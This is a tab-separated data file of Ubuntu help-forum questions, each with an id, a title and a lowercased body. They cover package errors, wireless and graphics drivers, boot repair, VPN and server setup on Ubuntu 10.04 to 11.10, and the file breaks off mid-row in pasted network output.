102069	how to resolve compiler to compile c++ program ?	whenever i try to compile a c++ program with g++ hello.cpp , i get : the program 'g++ ' can be found in the following packages : * g++ * pentium-builder try : sudo apt-get install < selected package > then if i run sudo apt-get install g++ it outputs : e : unable to correct problems , you have held broken packages .
102074	how do i remove ubuntu and install windows 7 ?	i have purchased a new dell insperion 620s desktop . it has ubuntu installed by default . i want to remove ubuntu , and install windows 7 instead . please help me understand the steps to remove ubuntu .
102080	how do i troubleshoot network issues with my vps ?	problem : i occasionally have network issues with my ubuntu vps . i can not ssh to the box , i can not ping the box by ip address . i can access the box via host serial terminal . when i access the box via serial , i ca n't ping out anywhere ( far as i can tell ) , even when pinging by ip address . after some amount of time the network comes back , sometimes without my intervention . sometimes it comes back when i am fiddling around . but it is hard to tell why . ( edit : it is very consistently out for 1 hour ) questions : how can i proceed in troubleshooting this issue ? what things can i do in order to rule out configuration/software problems in my control so that i can feel more comfortable bringing up the issue to my vps host ? things i have tried : bring eth0 down and up disable firewall temporarily checked vps host advisories for network issues - have n't seen any reboot the server via web console note : none of these have worked for me details : ubuntu 10.04.1 lts hosted with xen virtualization have root access ( ssh ) to perform my own upgrades , installs , etc . i have the vps setup as a vpn server so that i can connect to it `` road warrior '' style and forward all my traffic through the vps first . so that is the junk with 10.8.x.x all traffic including dns lookups are forwarded through the vps use uncomplicated firewall ( ufw ) with some basic rules also acts as a server for some services including mumble and web server i setup a script on the vps as a cron job to ping some common internet entities by ip address every 5 minutes . if there is failure in the ping , then it logs it to a file . simple enough . consistently the network outage lasts for an hour . it does not always happen at the same time of day . on almost all of the occurrences , the network is down for an hour and then it `` magically '' comes back . memory usage on my vps is typically very high . usually i am maxed out and using some swap . the memory hog is java , if that detail helps . my provider has been very unhelpful . it has ranged from `` we are sorry , we had an unfortunate issue '' to `` there is no problem now '' . this is frustrating to me because typically i make a ticket when there is a problem , but the problem is gone by the time the ticket is addressed . the most recent communication has been that they suggest reformatting my vps and starting over , which i am not keen about . consistently network outages start on the hour ( within 5-10 minutes ) . that is , network outages do not start around xx:30 , xx:45 , etc . netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 10.8.0.2 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 xx.57.166.0 0.0.0.0 255.255.255.128 u 0 0 0 eth0 192.168.50.0 10.8.0.2 255.255.255.0 ug 0 0 0 tun0 10.8.0.0 10.8.0.2 255.255.255.0 ug 0 0 0 tun0 0.0.0.0 xx.57.166.1 0.0.0.0 ug 0 0 0 eth0 ip route list 10.8.0.2 dev tun0 proto kernel scope link src 10.8.0.1 xx.57.166.0/25 dev eth0 proto kernel scope link src xx.57.166.59 192.168.50.0/24 via 10.8.0.2 dev tun0 10.8.0.0/24 via 10.8.0.2 dev tun0 default via xx.57.166.1 dev eth0 metric 100 cat /etc/network/interfaces auto eth0 iface eth0 inet static address xx.57.166.59 gateway xx.57.166.1 netmask 255.255.255.128 auto lo iface lo inet loopback
102085	11.10 very slow with radeon hd 4290 onboard	i just changed to ubuntu 11.10 and i have had a painful experience trying to configure the onboard vga . i read a lot of articles here and in the web , looked everywhere , but i didn find a fix for it . well , here goes my system specs : processor : amd phenom ii 1090t six cores memory : 4 gb of ram graphics : radeon hd 4290 onboard ( 512 mb shared ) for my surprise , the system is very laggy , the windows move slow when i grab and move them around , the scroll of firefox is not fluid , i tried some games and emulators to test , open-msx run games but not fluid , scummvm is the same story . when i open more than one window then it became more slow , xara xl and gimp get laggy after i do some work with them ( the more filters i apply , the more slow the o.s . gets ) . well , i tried the driver that came with the install , the proprietary driver from additional drivers , the last version of catalyst from amd web site ( the driver installs , but when i try to use catalyst it says there iĺ no driver installed ) , i unmarked vsync in ccsm , and nothing changed . in my system info tab , the graphics appears as vesa : rs880 , i read there is some options for the driver : vesa , ati , radeon , radeon hd as far as i can remember , vesa is more compatible but does n't have acceleration and radeon has good 2d and 3d acceleration for the system , so i tried to install a radeon driver but my system could n't be accessed anymore , so i had to format again . sorry for the big text , but i spent some days trying to figure it out , i read a lot of stuff , i looked here , to see if there was someone with the same problem and vga i have , but could n't find anything . what am i doing wrong ? is there any other driver to make my vga works better ? am i using the wrong ubuntu version ? i use xara xl , gimp , inkscape and blender a lot , so i am very worried about this and i know that my specs can give much more than i have now .
102087	unable to authenticate on wpa2 network ( oneiric )	i am having trouble connecting to my wireless network at home . i am dual booting 64-bit ubuntu oneiric with windows . i have an hp pavilion elite e9262f and the problem seems to relate to my wireless card . when i log into ubuntu , i notice the blue led light , that usually indicates the wireless card is active , does n't turn on like it normally does when i log into windows 7 . the odd thing , though , is when i disable my wireless on ubuntu ( either by typing `` ifconfig wlan0 down '' or by manually unclicking enable wireless at the top right corner , the led light turns on . however when i enable it again , the light turns off . for some reason they 're switched . when the led is off , i am able to still scan for networks and occasionally i will even succeed in connecting to a network . unfortunately , most of the time it will try to connect and repeatedly ask me for the password again and again until it times out . i 've tried installing other networking clients such as wicd and even removing network-manager but the problem always seems to reoccur . i am completely clueless as to what the problem could be so any help would be greatly appreciated !
102090	ca n't download from ubuntu software center	i 'm a linux first timer . the first few days everything was running fine but then when y try to download someting : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 968 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1092 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 235 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate a file for the ttf-mscorefonts-installer package . this might mean you need to manually fix this package . psd : i 'm a windows user trying linux . i do n't know anything about terminals . thanks
102093	how to see the command attached to a bash alias ?	suppose i have an alias in the bash shell . is there a simple command to print out what command the alias will run ?
102099	where is the .trash folder ?	using ubuntu 11.10 , i accidentally deleted a file that was approximately 700 mb . i tried to find it in the in following locations , but could n't : /home/user/.local/share /home/user/ < -- there was no folder .trash /home/user/desktop/ < -- there was no folder .trash so where did .trash go in ubuntu 11.10 onward ? i use the gnome environment .
102101	how do i get `` fable : the lost chapter '' working with wine ?	i would like to play `` fable : the lost chapter '' . but i do n't know how to set up wine and playonlinux in ubuntu . i played fable : the lost chapter in windows xp but i decided to switch to ubuntu , and really miss that game now . if you would be so kind to explain step by step what i need to do to play it .
102108	where can i download the drivers for a canon mp 420 series ?	i 'm trying to set up a canon mp 420 series printer on ubuntu 11.10 , but for some reason the wizard ca n't find the corresponding drivers . i looked for the drivers in , but they are not there . even though the printer appears as installed and functioning , i can not print with it form ubuntu . does anyone know how i can fix this ? i 'd really appreciate your help .
102110	magical unchanging flash storage	i have a couple of usb thumbdrives and some sdcards . all of my flash storage devices have the same problem , in 11.04 ubuntu it looks like i can delete from , save to , even format the devices , but as soon as i unmount them and then look at them in another system or put them back on the ubuntu system then the old files reappear and the new ones are nowhere to be found . this includes using disk utility to format the drives . ( ? ? ? ) anybody have a clue what 's wrong with my install ? the optical drive ( dvd+r ) is working fine . this is all quite entertaining , but i need to be able to use my sdcards .
102117	how to update to php 5.3.10 in 10.04 ?	i 'm new to linux and have only the basic experience with ubuntu and installing lamp server . i 've successfully installed all using the `` apt-get install '' method . my problem is i want to update php 5.3.2 to php 5.3.10 . it is possible to do that ? tia !
102118	how to restart gnome shell after a crash short of killing x ?	how can i restart gnome shell after a crash ? alt+f2 and restart wo n't work as the prompt crashed with the shell . since windows focus is gone along with the shell as well , i ca n't type gnome-shell -- replace in a terminal , either . the ctr+alt+f1 command line ca n't open the x display . so i 'm left with killing x , thus loosing all open applications . is there a keyboard shortcut for restarting gnome shell ?
102119	microsoft word , excel and powerpoint wo n't save or open files	i 'm a web developer , but new to linux . i am currently running ubuntu 11.10 with a gnome shell and wine ( i think 1.3 ) . i 've installed microsoft office 2007 , and worked through a small issue with powerpoint not running . so one little issue left , i ca n't save files , and i ca n't open files . i 've checked all over the various forums , and have n't found a solution yet . i have n't yet tried to completely uninstall wine and start from scratch ( i have n't done that because i 've actually got photoshop working , whoo ! ) anyways , would truly appreciate some help .
102125	error : no such partition . grub rescue >	after installing ubuntu 11.10 , alongside windows 7 , when pc restart automatically first time , i got this message , just below the table , pci device listing , error : no such partition grub rescue > now pc is not booting at all , even if i restart it .
102130	ca n't access host serial port on virtualbox winxp	my host is ubuntu 11.04 . the guest is winxp virtualbox is 4.0.10 the serial port works well with putty in ubuntu . i setup as : com1/4/0x3f8/host device/ port path : /dev/ttys0 then i close putty , to make serial port is free . after windows xp and device manager started , i see there is a lpt1 instead of com1 under `` ports ( com & lpt ) '' i followed the procedure in this topic ( how to access serial ubuntu host serial port on virtualbox guest os ) , but the issue keeps not resolved . thanks for any help .
102133	how do i install a new icon set ?	i am looking for new look to ubuntu desktop . i 've read about something called the faenza icons but i dont know where to download these or how to install these . can anyone provide me some step-by-step instructions please ?
102135	prevent origami ( folding @ home ) from using all cores	after installing origami , my cpu fan starts running full-speed constantly . this i 'd like to prevent because it is too much of a distraction when not using the system . i 've noticed all cores are utilized by default . i.e . 6 folding @ home instances are running at 100 % . i would expect fan speed going down when i switch to e.g . using only 2 cores but i ca n't find how to do this . the author of origami did not respond to the issue so far . using something like cpulimit is something i 'd like to prevent . does anyone know how to achieve using less cores ?
102136	squid 3 installation error	i am trying to install squid using command sudo apt-get install squid but i am getting following error -- betgbs @ proxy-server : ~ $ sudo apt-get install squid reading package lists ... done building dependency tree reading state information ... done e : unable to locate package squid i also tried to install apache2 and many other softwares but getting same error . installation is done properly and system is working fine . please help me out to install squid 3.1.19 on my ubuntu system . thank you
102137	could n't install ubuntu through wubi 11.10 - failed with : [ errno 4 ] ioerror : < urlopen error ( 7 , 'getaddrinfo failed ' )	i am not being able to install ubuntu using wubi . after running wubi and selecting the drive and passwords etc . , the download starts but an error occurs which says unsubscriptable object for more information , please see the log file : appdata\local\temp\wubi-11.10-rev245.log my operating system is windows 7 64 bit . tried for all type of drives like primary and logical also . please help . thanks ! extract from log file : ... file `` \lib\urlgrabber\grabber.py '' , line 1188 , in _make_request urlgraberror : [ errno 4 ] ioerror : < urlopen error ( 7 , 'getaddrinfo failed ' ) > 02-07 13:11 error tasklist : non fatal error [ errno 4 ] ioerror : < urlopen error ( 7 , 'getaddrinfo failed ' ) > in task download 02-07 13:11 debug tasklist : # # # finished download 02-07 13:11 error tasklist : unsubscriptable object ...
102140	boot optimisation , takes too long	i ca n't seem to get my system ( asrock ion 330 , ocz agility 4 120gb , 4gb , 11.10 ) to boot in under 30ish seconds . i would expect having an ssd , things could boot a bit faster ... main challenge seems to be compiz/unity but there is also a 4-5 initial sec boot delay between starting the keyboard driver and mounting the disk : [ **2.825511** ] generic-usb 0003:046d : c318.0006 : input , hiddev0 , hidraw5 : usb hid v1.11 device [ logitech logitech illuminated keyboard ] on usb-0000:00:04.1-5.4/input1 [ **7.037201** ] ext4-fs ( sda2 ) : info : recovery required on readonly filesystem [ 7.037278 ] ext4-fs ( sda2 ) : write access will be enabled during recovery [ 7.241351 ] ext4-fs ( sda2 ) : recovery complete [ 7.241720 ] ext4-fs ( sda2 ) : mounted filesystem with ordered data mode . opts : ( null ) greatly appreciate your thoughts/advice .
102142	why fixing broken packages / installation in ubuntu 11.10 takes very long time for java6 ?	sometime back , i was installing java jdk and jre as : sudo apt-get install sun-java6-jdk sun-java6-jre due to some problems , the installation stopped and it remained broken . as we know , one can not install any package until the broken installations are fully resolved . so , i tried : sudo apt-get -f install # helps for installing broken packages however , i see that installation of java6 takes unusually very long time . also upon the terminal i see a colorful page while java6 installation is going on ; this page displays various terms and conditions . i can just scroll this page up and down , but ca n't see what is happening behind . but the main problem is long hours . is there any way to fix this problem ? for other installations , i may not need jdk/jre ; so as a last resort , i am ok , if we can remove these broken packages . but how to do that ?
102147	can not launch nautilus due to libunity.so.6 missing	when i try to launch nautilus i got this error : nautilus : error while loading shared libraries : libunity.so.6 : can not open shared object file : no such file or directory i got the same with marlin & brasero . i have tried this command : sudo ln -s /usr/lib/libunity.so.9 /usr/lib/libunity.so.6 but it does n't work at all . im going to cry ... please help me !
102150	completely remove desura	i 'd like to completely remove desura and any downloaded games . as far as i can see , the only way to do this successfully is to go through the home folder manually removing the various files/folders . is this correct ? is there a simpler method ?
102152	how to use freeradius ?	could anybody tell me the steps to run and configure a freeradius on ubuntu . i 've installed it through software center . also let me whether lamp-server is required ? i do n't want to have a ldap directory , just a local set of few usernames/password .
102153	untrusted package errors , after installing security tools	i installed all of security tools provided from the ubuntu.com and some others listed in other websites . then i added backtrack repositories to update them . and used update manager to update the tools . since then , i am getting untrusted package errors every time , every where , whether is update manager or software center . unless i do it from the terminal . i read in few posts , that they are caused by keys , not being authenticated properly so i needed to update them . i tried that too , but none of them are working . help me fix this issue . i have tried solution suggested in this question . it did n't change anything sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 40976eaf437d05b5 executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.tsqj1k1d2g -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv-keys 40976eaf437d05b5 gpg : requesting key 437d05b5 from hkp server keyserver.ubuntu.com gpg : key 437d05b5 : `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' not changed gpg : total number processed : 1 gpg : unchanged : 1
102156	how do i remove apache installed with make install and use apache from the repositories ?	i want to completely remove apache from ubuntu 11.10 . i have installed httpd-2.2.22 package through make and the make install command . now i want to uninstall it and install through apt-get . can anyone help me ?
102159	will there be a security fix for php in 10.04 lts ?	is there already a security fix available for the latest critical php vulnerability in 10.04 lts ? if not when will it be available ? http : //thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/ or does this critical vulnerability does not apply for version 5.3.2-1 that comes with ubuntu ?
102160	uninstalling gnome 3 and reverting back to gnome 2 ?	is it possible to completely purge anything gnome3 and completely revert to gnome 2 with the panel and stuff . i do not want to get suggestions on how to get to the classic session , i want to know how to uninstall the gtk3 stack from 11.10 and replace it with gtk2 i know gnome is no longer maitaining gnome2/gtk2 so , i know the concerns.. backward incompatability e.t.c
102163	iso live session from an external hard drive ?	is it possible to use an external hard drive to start a live ubuntu session ? is having an iso file as the whole content of the first partition of the device enough ? thank you for reading ... ! edit upon reading the first comment to my original question : if i remember correctly , i could run a live session of oneiric ocelot somehow . it was not from a cd because i failed to burn one , so it must have been from an iso file . still very very confused ... .
102164	wireless problems , doesnt seem to have any easy fix	i was on my laptop dell latitude d630 ( wireless was working just fine ) then out of no where it stopped working but if use a wireless usb adapter i can reconnect i have tried sudo get-apt install firmware-b43-installer and i tried purging the bwml ( something ) , i have rebooted removed the adapter and im still not able to connect to the wireless , i can see all the available networks but it wont let me connect to any , i have passwords for all of them , but when it times out it prompts me to enter the wireless password again and then repeats the same problem .
102165	how do i reset byobu 's settings ?	right problem is i want use byobu i really like it but i messed up and changed settings in f9 and choose the screen keybindings now i cant get back to the f9 settings to change it back and cant use any the f keys for byobu , its very annoying and cant find a solution anyone care to help with the matter ? i tried remove byobu and screen without any difference made i hunted online cant find an answer either i 'm running ubuntu server 10.4 thank you in advance .
102168	how to access a synced folder from another pc ?	i want to share my gnote files between two ubuntu pcs . therefore i sync the folder ~/.local/share/gnote to ubuntu one . but i do n't know how to tell gnote on the other pc to utilize this synced folder .
102175	autostart thunderbird on the tray in lubuntu	i want to have thunerbird minimized when i turn on the laptops . when i do this : vi /etc/xdg/lxsession/lubuntu/autostart and added @ thunderbird every time i turned it on a popup apear say that thunderbird is already running ... but it works just fine . how do i clear that popup ? how do i run it minimezed ?
102178	mbr seems to be unfixable	my system ( 1 hdd , 2 partitions - 1=windows , 2=ubuntu ) is not booting any longer , but when i shut it down from ubuntu yesterday , there was no problem at all . my last try was boot-repair ( with recommended repair ) started from a live ubuntu-usb system . that is the pastebin of various logs . it seems that it worked perfect , because i get the screen with the choice of windows and ubuntu , but after i enter , an error-page appears . something like this : error at starting windows , the source could be hardware or software changes in the past '' for me it looks like the typical defect-mbr-message , but then boot-repair did n't worked properly . anyone knows a trick , maybe a magic one ? update : now it 's getting weird . i try to reconstruct what i did in the last minutes . mistakes are not impossible . i installed grub2 on my live-distro and executed this command . sudo grub-install -- boot-directory=/mnt/boot/ /dev/sda i was not sure if the last parameter is /dev/sda or _/dev/sda_1 , because sda1 was the first partition on the hdd , but when i executed it , an error appeared . so i tried just sda and it worked . well , it seems that it worked . then i rebooted and got the grub recovery-line . the only possible command , that i knew was ls and it showed something like : ( hd0 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) and when i tried to ls hd0 , it showed unknown filesystem and ls hd0 , msdos1-3 showed wrong filename . so i started ubuntu from my usb-drive again and i just wanted to get sure that my partitions are still ok and typed in sudo blkid . this is the result : /dev/sda1 : label= '' pendrive '' uuid= '' 1a0c-1658 '' type= '' vfat '' /dev/sdb1 : label= '' os '' uuid= '' 9a34a62d34a60c77 '' type= '' ntfs '' /dev/sdb2 : label= '' data '' uuid= '' 8a9aaa5c9aaa4513 '' type= '' ntfs '' so my usb-drive is now sda instead of sdb and my hdd-partitions are sdb instead of sda . maybe i 'm too tired and see ghosts , but what did i wrong ?
102181	broadcom brcm80211 installation from source	hello need help to get my wifi chipset working.i have brcmsmac driver and i would like to have brcm80211 chipset up and running . i have tried everything but nothing helped ? git : //git.kernel.org/pub/scm/linux/kernel/git/dwmw2/linux-firmware.git copy brcm/bcm43xx-0.fw and brcm/bcm43xx_hdr-0.fw to /lib/firmware/brcm ( or wherever firmware is normally installed on your system ) . still got brcmsmac ? ? then i tryed git clone git : //git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git git clone git : //git.kernel.org/pub/scm/linux/kernel/git/dwmw2/linux-firmware.git cd ~/linux-next/drivers/staging/brcm80211 nano makefile the problem is that there is no brcm82011 folder ? ? do i follow cd ~/linux-next-a694cb1 like the link sad ? i have broadcom corporation bcm4313 [ 14e4:4727 ]
102189	force vpn connection automatic	i have a vpn connection on a server that must be connected at all times . i can make a connection , but i would like it to connect on boot , and if the connection drops it should reconnect automatically , preferably with some sort of notification that the connection has gone down but is now back up . the vpn is on openvpn . what is the best way to do this ?
102190	does anyone have any idea if/when ubuntu is going to switch the default ruby install from 1.8 train to the 1.9 train ?	i 'm kind of hoping it 's not going to be a python 2.7/3.0 thing , but i thought i might find someone `` in the know '' .
102192	upgrade of virtual machine upgraded main machine	i was running ubuntu 10.11 , with several virtual machines on it ( windows xp , windows 7 , ubuntu 11.04 etc ) and decided to update the ubuntu 11.04 virtual machine to 11.10 . however , it decided ( there was no option anywhere ) to update the main machine , not the virtual machine and consequently , the computer won't boot up ! i have got it going using a flash drive and i can see all my files - but i ca n't get at them to copy , because it says i do not have the necessary permissions . similarly , i can see the virtual machine folders , but i ca n't access them . anyone any bright ideas ? thanks chris
102198	how to copy everything from usb to file system	i have mounted the usb and have successfully accessed it . on the usb are files and directories with files within them as well as .htaccess files . i know that the terminal ca n't see the .htaccess files since everything in ubuntu starting with . is hidden . however , i can see them on the gui if i enable show hidden files . anyways , my question is , how do i copy everything , including the .htaccess and directories while keeping the structure intact as it is on the usb to /var/www thanks
102200	removable hdd format	i am just wondering which type of partitioning i should choose for installing a linux distro in a usb hard drive . i want to have partitions for / , /usr , and physical memory . which of them should be primary partitions and which of them should be logical ?
102201	connection problems between access point and ubuntu	i have an access point already configured ( with another ap and it 's 3 ip cameras ) and i can get in with a winxp laptop ( by ap 's ip address ) who is wired connected , directly to the ap . now , i want to mount an ubuntu computer to stay connected as my laptop is . there is not any difference , only os . first of all , i was trying to get in the ap ( via browser and ap ip addr ) like this : ap and ubuntu desktop connected to a switch , and this connected to a router ( the ip address of the ap is static ) . with this , i ca n't get in to the ap . even so , writing in terminal nmap -a -pn 192.168.1.123 , i get this : '' nmap done : 1 ip address ( 1 hosts up ) scanned in 201.64 sec '' with this , i understand that my computer can see the ap right : o ? pd : doing this with my computer connected directly to the ap via eth cable it 's the same thing . sorry about my english and thanks ! diego v .
102202	how to use two different fonts for chinese and english in firefox ?	i want to use wenquanyi for chinese and palatino for english in firefox . how can i do this ?
102205	wireless on my eee 1005ha does n't work properly yet there 's no additional driver listed	reception is full but it often fails to connect to web pages . kernel after updating : 3.0.0-15 . router model is d-link dir-615 . how can i find an appropriate linux driver ? the first one ( output ) : *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 00:25 : d3:5e : e6 : b0 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.0.0-12-generic firmware=n/a ip=192.168.0.102 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : fbff0000-fbffffff *-network description : ethernet interface product : ar8132 fast ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : c0 serial : 00:26:18 : ac : ed : e6 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:45 memory : f7fc0000-f7ffffff ioport : ec00 ( size=128 ) the second one : 0 : eeepc-wlan : wireless lan soft blocked : no hard blocked : no 1 : eeepc-bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no the third one : linux arno-1005ha 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:50:42 utc 2011 i686 i686 i386 gnu/linux
102221	how do i remove sun java and use openjdk instead ?	as a programmer i use java for learning to code in netbeans . i installed sun java 6 long time ago over openjdk that came with my ubuntu just cause it seemed more responsive ... now that oracle left the repos i wanted something easy to handle to install and uninstall , so i want to remove completely sun java 6 from my computer and set as default openjdk ... .and openjre . i already have installed openjdk and openjre ... but not marked as default . besides i want to clean sun java from here , dont wan na get messy ^^ . running ubuntu 11.10
102224	configuring separate x screens instead of twinview	my sony vaio laptop is connected to an external samsung monitor and my nvidia driver is configured in twinview mode . everything is ok with this , however , i can not adjust my displays individually so at the moment my external display is a little bit darker which disturbs me a lot . i tried the separate x screen mode but after restart , my laptop display was white with a black x sign mouse pointer and the external display normal desktop . is it a bug or something i missed ? the idea is that using separate x screen mode , i could adjust my displays individually . i would really appreciate someone would guide me out of this situation . thanx in adv..
102232	how to give back to the oss community without coding ?	i have been using open source software for a few months and loving it . something is dawning on me , a feeling of wanting to give back . though , i do not know how to do it , as i do not have money to donate or time to code . are there alternative ways i can do to help the oss projects i learned to use and love ?
102234	open multiple instances of a ( .pdf ) file	i would like to open multiple instances of the same file with some sort of command . i 've tried some very unsophisticated ideas ( e.g. , an alias or function in my .bashrc , a simple shell script ) , but they all open the file once , then open another instance after i close the first open file ) . i know it 's not a big deal to simply type an aliased command four ( say ) times , but it must be dead easy to write a command that would call , e.g. , mupdf /path/to/file/file.pdf four times so the file is opened four times all at once.. ?
102239	what ubuntu alternatives will still be supported after 12.04	i have read today that kubuntu might not be supported after the 12.04 release . is this true ? and if yes , what other ubuntu alternatives have the same fate and why ?
102256	what music player shows `` similar bands you might like '' feature	in 11.04 i used banshee or rhythmbox because it had a feature that told me , when i was listening to a song what other bands from other similar groups i would enjoy . most of the time it was correct or at least it helped me find a group i have not heard for a long time . in 11.10 neither of them have this feature or at least i do not know which one had it and how to activated it again . what music player has this particular feature in 11.10
102258	how to set cpu affinity to a process	how can i set how many physical cpus can a process use ( cpu affinity ) before the process starts .
102259	how do i mount a truecrypt volume with special options ?	i would like to mount an ext4 truecrypt drive with -- fs-options but it does n't work . also i created a fat partition and the following command is working . what is the alternative command if my partition is ext3/ext4 ? sudo truecrypt -- mount /media/vulturus_data/test3 /media/true -- fs-options= '' users , uid=115 , gid=123 , fmask=0113 , dmask=0002 ''
102263	unable to login after deleting my home partition ?	i deleted my /home partition now i am unable to log on . when i log on as guest i get a blank desktop is it possible to fix this preferably without reinstalling ?
102267	best practice to monitor ubuntu server	i have an ubuntu server that is intermittently rebooting . i notice the reboot once every 3 weeks or so . i have a feeling that this is occurring more often and i want to get an accurate picture of the problem and how often it is occurring . i was thinking about configuring an email that would be sent on server boot , but i wanted to ask the question here to see what is the best practice for monitoring servers . noticed that you can configure server to send email by using bootmail or by script using cron . i also noticed nagios , but that seems a bit more complicated and detailed . what is the best practice for monitoring ubuntu servers ? i am looking for something simple but yet flexible and powerful . the less shell scripting the better .
102269	how to edit etc/usb_modswitch.d ?	hello i would like to enter a text file with some code in this directory ( etc/usb_modswitch.d ) . how can i do this ? please help me . i have try to do this by just move the file but it 's a root directory so i got the message permission denied ! so how can i become the root and able to copy paste a file there or is it possible to to do this changes by using terminal ? thanks . my os is ubuntu 11.10 version .
102271	are there any known vulnerabilities to ubuntu 's full disk encryption feature ?	are there any known vulnerabilities to ubuntu 's full disk encryption feature ? i have some storage devices ( thumbdrive and a few external hard drives used for backups ) that i use with full disk encryption , so that if they 're lost or stolen , my data ca n't be retrieved . is this a false sense of security ? if someone were to obtain an encrypted drive , would it be possible for them to break the encryption , and if so , how long would it take ? edit : to clarify , i 'm only asking about non-bootable drives . i 'm aware of vulnerabilities to encrypted drives that are still used to boot the os .
102278	feed my appletv with media from my ubuntu desktop pc	i 'm about to buy an appletv and i 'm wondering if it is possible to access the media that are hosted on my ubuntu pc . at home , i have : a ubuntu pc with all my media on it a windows laptop ( not always available/running ) that i 'm using to configure my ipad2 ( and soon , my appletv ) an ipad2 for what i understand : appletv can access the media via itunes if it is opened on my windows laptop . i can stream media from my ipad2 to the appletv ( in the case itunes is not available ) is it possible for me to setup my ubuntu pc to send media via airplay to the appletv ? edit : if it is not possible via airplay , any other suggestion are welcomed . edit2 : what about intalling xbmc or thin plex client on a jailbroken apple tv ( 2nd or 3rd gen ) ? thanks
102280	can i modify the keyboard shortcut for workspace switching ?	i use both os x and ubuntu ( 11.10 ) . in os x , ctrl+arrow is the shortcut for changing space . when i use ubuntu , i habitually press ctrl+arrow to change space . actually i should use alt+ctrl+arrow . can i change the shortcut key ? thanks . sam
102281	stream microphone audio over wan ?	i 'm looking for a command line program to capture audio from a microphone , save and stream it over a wan . arecord test.wav seems to work for recording input , but i can not figure out how to get it to save as an mp3 for file size reduction . could i stream audio over ssh ? would vlc work ?
102282	broadcom 4312 wireless issues	i know theres a plethora of other questions and some are `` solved '' out there for this same issue but i 've run through all that i can find to no avail . i solved this problem once but then i went on to troubleshoot an injection issue fora nother program and i messed up the wireless so i reinstalled and now i ca n't get it working again ! on this reload of ubuntu 11.10 ive already tried a couple things so ill post as much relevant info as i know . i 'm new to linux entirely having only used it for about a week now . lspci : 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 03 ) 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation ich9m/m-e sata ahci controller ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 0e:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 1a:00.0 firewire ( ieee 1394 ) : o2 micro , inc. device 10f7 ( rev 01 ) 1a:00.1 sd host controller : o2 micro , inc. device 8120 ( rev 01 ) 1a:00.2 mass storage controller : o2 micro , inc. device 8130 ( rev 01 ) iwconfig : lo no wireless extensions . eth0 no wireless extensions . eth2 ieee 802.11 access point : not-associated link quality:5 signal level:0 noise level:0 rx invalid nwid:0 invalid crypt:0 invalid misc:0 ifconfig : eth0 link encap : ethernet hwaddr 00:24 : 